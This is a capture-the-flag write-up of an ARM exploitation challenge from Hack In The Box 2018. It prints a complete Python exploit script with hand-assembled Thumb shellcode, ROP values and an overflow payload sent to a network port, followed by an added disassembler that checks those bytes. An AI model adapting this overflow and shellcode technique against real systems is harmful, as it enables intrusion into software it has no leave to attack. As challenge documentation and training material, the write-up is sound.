beVX Conference Challenge – HiTB
Credit to Author: SSD / Noam Rathaus | Date: Fri, 22 Jun 2018 11:30:44 +0000
During the Hack In The Box event we launched an ARM reverse engineering and exploitation challenge and gave the attendees the chance to win great prizes.
The challenge had two parts: a file, which can be downloaded from https://www.beyondsecurity.com/bevxcon/bevx-challenge-10, that you had to download and reverse engineer, and a server you had to connect to in order to reach a running instance of that file.
The challenge consisted of a binary acting as a ‘server’ that waits for incoming connections; when a connection arrives and a certain ‘protocol’ is followed, it prints ‘All your base’ and exits. The task was to write an exploit that makes the program print ‘Belong to us!’ instead.
The intended way of solving this challenge was to perform an overflow and redirect the code's execution path; one of the submitted solutions did not follow this route and was still able to change the program's output.
We received several submissions; only two solved the challenge completely, the others were close but did not meet our minimum requirements and are therefore not presented here.
ebux25
In this submission the execution path is not hijacked; instead the displayed string is overwritten so that the program does not crash and still prints the required string. While this was not the intended idea of the challenge, there was no rule against this kind of solution.
yohanes
The solution provided by yohanes came closer to what we were looking for: it changes the code execution path.
```python
#Yohanes Nugroho
#Twitter/github/gmail: @yohanes/@yohanes
# Python 2 script (uses str.decode("hex") and the print statement)
import socket
import struct
import sys

if len(sys.argv) < 2:
    print "usage: client.py <host> \n"
    print "will use port 2323\n"
    exit(0)

host = sys.argv[1]

ch2 = "3a5a6e01".decode("hex")
ch1 = "3b2a6b25".decode("hex")

r2 = "\xc6\x80\x5a\x17"
r3 = "\xe1\x80\x80\xcd"
ip = "\x80\x74"

#ROP TO id87480
# r2 ^ r3 will result in address 0xdada0027

payload_asm = """
#overwrite string
movs r0, r0
movs r0, r0
str r3, [r3]
movs r2, #8
strb r2, [r3] ; offset to string belong to us
ldr r3, [r3]
movs r2, #13
lsls r2, r2, #4
lsls r2, r2, #4
adds r2, #76
negs r2, r2
add r2, r2, r9
ldr r2, [r2]
ldr r2, [r2]
ldr r4, [r3]
str r4, [r2]
ldr r4, [r3, 4]
str r4, [r2, 4]
adds r3, r3, #8
adds r2, r2, #8
ldr r4, [r3]
str r4, [r2]
ldr r4, [r3, 4]
str r4, [r2, 4]
#return
movs r2, #14
lsls r2, r2, #4
lsls r2, r2, #4
adds r2, #53
negs r2, r2
add r2, r2, r9
bx r2
"""

# hand-assembled Thumb encoding of payload_asm above
payload = "\x00\x00\x00\x00\x1b\x60\x08\x22\x1a\x70\x1b\x68\x0d\x22\x12\x01\x12\x01\x4c\x32\x52\x42\x4a\x44\x12\x68\x12\x68\x1c\x68\x14\x60\x5c\x68\x54\x60\x08\x33\x08\x32\x1c\x68\x14\x60\x5c\x68\x54\x60\x0e\x22\x12\x01\x12\x01\x35\x32\x52\x42\x4a\x44\x10\x47"
payload += "\x00\x68"  # this will make it crash, used to check register values

n = 128 - 38 - len(payload)
#print "LEFT ", n  # how much shell code space left

tous = "Belong to us!\x00"
padding1 = "B" * (30 - len(tous))
padding2 = "A" * n

pl = ch1 + ch2 + tous + padding1 + payload + padding2 + r2 + r3 + ip

#this will make sure we can encode/decode the string as UTF-8
print "IS OK ", pl.decode("utf-8").encode("utf-8") == pl
print "Sending payload \n", pl

s = socket.create_connection((host, 2323))
s.sendall(pl)
s.recv(1)
```
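To check the hand-assembled bytes against the listing without an external toolchain, here is an added Python 3 example (not part of the original write-up or of yohanes's script) that decodes the 16-bit Thumb encodings used by the payload back into UAL mnemonics and folds the movs/lsls/lsls/adds/negs idiom into the r9-relative displacements it builds. The payload bytes are copied from the script; the decoder deliberately covers only the instruction classes that appear in it.

```python
import re
import struct

# Constructed copy of the 64-byte Thumb payload from the write-up (the 62 bytes
# of the listing plus the trailing "ldr r0, [r0]" crash probe), as hex text.
PAYLOAD = bytes.fromhex(
    "00000000 1b60 0822 1a70 1b68 0d22 1201 1201 4c32 5242 4a44 1268 1268 "
    "1c68 1460 5c68 5460 0833 0832 1c68 1460 5c68 5460 0e22 1201 1201 3532 "
    "5242 4a44 1047 0068")

def decode(hw):
    """Decode one 16-bit Thumb halfword from the subset the payload uses."""
    lo, mid, imm5, imm8 = hw & 7, (hw >> 3) & 7, (hw >> 6) & 31, hw & 0xff
    if hw >> 11 == 0:                            # lsls rd, rm, #imm5
        if imm5 == 0:                            # UAL prints lsls #0 as movs rd, rm
            return f"movs r{lo}, r{mid}"
        return f"lsls r{lo}, r{mid}, #{imm5}"
    if hw >> 13 == 0b001:                        # movs/cmp/adds/subs rd, #imm8
        op = ("movs", "cmp", "adds", "subs")[(hw >> 11) & 3]
        return f"{op} r{(hw >> 8) & 7}, #{imm8}"
    if hw >> 6 == 0b0100001001:                  # rsbs rd, rm, #0, i.e. negs
        return f"negs r{lo}, r{mid}"
    if hw >> 10 == 0b010001:                     # special data: add/cmp/mov, bx
        rm, op = (hw >> 3) & 0xf, (hw >> 8) & 3
        if op == 3:
            return f"bx r{rm}"
        rdn = ((hw >> 7) & 1) << 3 | lo          # high-register form, e.g. add r2, r9
        return f"{('add', 'cmp', 'mov')[op]} r{rdn}, r{rm}"
    if hw >> 13 == 0b011:                        # str/ldr(b) rt, [rn, #imm]
        byte, load = (hw >> 12) & 1, (hw >> 11) & 1
        op, off = ("str", "ldr")[load] + "b" * byte, imm5 if byte else imm5 * 4
        return f"{op} r{lo}, [r{mid}, #{off}]" if off else f"{op} r{lo}, [r{mid}]"
    return f".hword {hw:#06x}"                   # outside the decoded subset

def disassemble(blob):
    """Disassemble a little-endian Thumb-16 byte string into UAL mnemonics."""
    return [decode(hw) for (hw,) in struct.iter_unpack("<H", blob)]

def r9_displacements(insns):
    """Fold the movs/lsls/lsls/adds/negs idiom (Thumb-16 cannot load a large
    immediate directly) into the displacement each 'add r2, r9' ends up adding."""
    val, out = 0, []
    for ins in insns:
        m = re.match(r"(movs|lsls|adds|negs) r2(?:, r2)?(?:, #(\d+))?$", ins)
        if ins == "add r2, r9":
            out.append(val)
        elif m:
            op, imm = m.group(1), int(m.group(2) or 0)
            val = {"movs": imm, "lsls": val << imm, "adds": val + imm, "negs": -val}[op]
    return out
```

`disassemble(PAYLOAD)` reproduces the listing instruction for instruction, and `r9_displacements` shows that the two idioms resolve to r9 - 3404 (the copy target) and r9 - 3637 (the return target).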